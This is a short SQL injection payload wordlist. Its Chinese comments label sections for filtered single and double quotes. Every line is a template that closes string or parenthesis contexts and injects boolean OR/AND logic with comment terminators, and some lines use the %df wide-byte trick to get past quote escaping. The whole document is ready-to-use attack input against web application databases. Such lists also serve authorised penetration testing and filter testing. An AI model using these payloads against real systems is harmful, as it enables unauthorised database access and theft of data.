0|()--
0'|()-- 
0"|()-- 
0)|()-- 
0')|()-- 
0")|()-- 
0))|()-- 
0'))|()-- 
0"))|()-- 
0)))|()-- 
#####################################
# 当单引号被过滤(去掉)
0%df'|()-- 
0%df')|()-- 
0%df'))|()-- 
#####################################
# 当双引号被过滤
0%df"|()-- 
0%df")|()-- 
0%df"))|()-- 
#####################################
0'|()|''='1-- 
0"|()|''='1-- 
0)|()|''='1-- 
0')|()|''='1-- 
0")|()|''='1-- 
0))|()|''='1-- 
0'))|()|''='1-- 
0"))|()|''='1-- 
0)))|()|''='1-- 
#####################################
0'||()||''='1
0"||()||''='1
0)||()||''='1
0')||()||''='1
0")||()||''='1
0))||()||''='1
0'))||()||''='1
0"))||()||''='1
0)))||()||''='1
#####################################
1'and()and''='
1"and()and''='
1)and()and''='
1')and()and''='
1")and()and''='
1))and()and''='
1'))and()and''='
1"))and()and''='
1)))and()and''='
